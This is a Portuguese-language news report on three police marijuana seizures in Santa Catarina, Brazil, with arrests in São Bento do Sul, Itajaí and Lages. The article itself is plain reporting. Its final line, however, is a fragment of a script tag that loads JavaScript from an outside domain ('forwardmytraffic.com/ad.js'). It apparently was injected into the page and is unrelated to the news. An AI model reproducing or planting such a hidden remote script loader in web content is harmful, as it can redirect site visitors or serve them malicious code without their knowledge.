A primeira aconteceu na tarde do último sábado, 9, policiais militares do 23º Batalhão de Polícia Militar (BPM), que realizavam um Comando de Trânsito na Estrada Dona Francisca, acabaram abordando dois veículos que entraram bruscamente em uma rua sem saída. Eles tinham a intenção de despistar as guarnições, porém não obtiveram êxito, devido à rápida ação dos policiais. Mais de meia tonelada de maconha foi encontrada em um dos veículos.
Durante a abordagem foi localizado 576,44 kg de maconha. Os quatro ocupantes dos veículos, três homens e uma mulher, foram detidos no local, sendo que um quarto homem conseguiu fugir para um matagal próximo, não sendo localizado durante as buscas posteriores na região.
A maioria dos detidos são naturais de São Bento do Sul e região e são suspeitos de pertencerem a uma facção criminosa. Conforme indícios apresentados há suspeita de que a droga seja de origem estrangeira e seria distribuída em São Bento do Sul e Florianópolis. Além disso, também foi constatado que um dos veículos era clonado.
A apreensão reflete o intenso trabalho da Polícia Militar em combater o tráfico de drogas e o crime organizado na região. Diante dos fatos e das suspeitas da origem da droga, os envolvidos foram presos e encaminhados juntamente com as drogas para o Departamento de Polícia Federal de Joinville/SC, para que fossem tomadas as devidas providências legais cabíveis.
Já a segunda foi na tarde de quarta-feira, 13, uma ação da Agência de Inteligência (AI) do 1º Batalhão de Polícia Militar (BPM) apreendeu 27 quilos de maconha e prendeu três envolvidos em Itajaí. A operação ainda apreendeu ecstasy, munições, dinheiro e materiais relacionados ao tráfico.
Sob posse de informações relacionadas a um suspeito, foi realizado monitoramento em sua residência e apurada a participação de outros dois envolvidos.
No veículo de um deles, foi encontrado 500 gramas de maconha. Na primeira residência envolvida, foram localizados cinco tabletes grandes da droga, munições calibre 38, dois comprimidos de ecstasy e diversos materiais relacionados ao tráfico. Na segunda residência, foram localizadas buchas pequenas, 150 reais e dois celulares.
No total, a operação apreendeu 27kg de maconha, além dos dois comprimidos de ecstasy e da prisão de todos os envolvidos, o que só foi possível devido ao empenho das guarnições participantes e das estratégias de monitoramento adotadas.
E a terceira foi uma operação desencadeada pelo Pelotão de Patrulhamento Tático (PPT) do 6º Batalhão de Polícia Militar (BPM), juntamente com a Agência de Inteligência (AI), também na quarta-feira, 13, em Lages, aprendeu cerca de 7 quilos de maconha, divididos em 15 invólucros plásticos, uma balança de precisão, 672 reais em espécie, uma faca e uma lâmina com resíduos da substância.
A AI do 6º BPM recebeu denúncia sobre um homem que estaria comercializando maconha em uma casa já conhecida pelas guarnições pelo tráfico de drogas e repassou as informações ao PPT, que realizou a abordagem ao masculino e fez a busca na casa encontrando a droga.
Diante da situação o envolvido, que é pai de um homem preso na semana passada pelo mesmo crime e com 19 quilos da droga, foi encaminhado à Delegacia de Polícia para as providências legais.
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>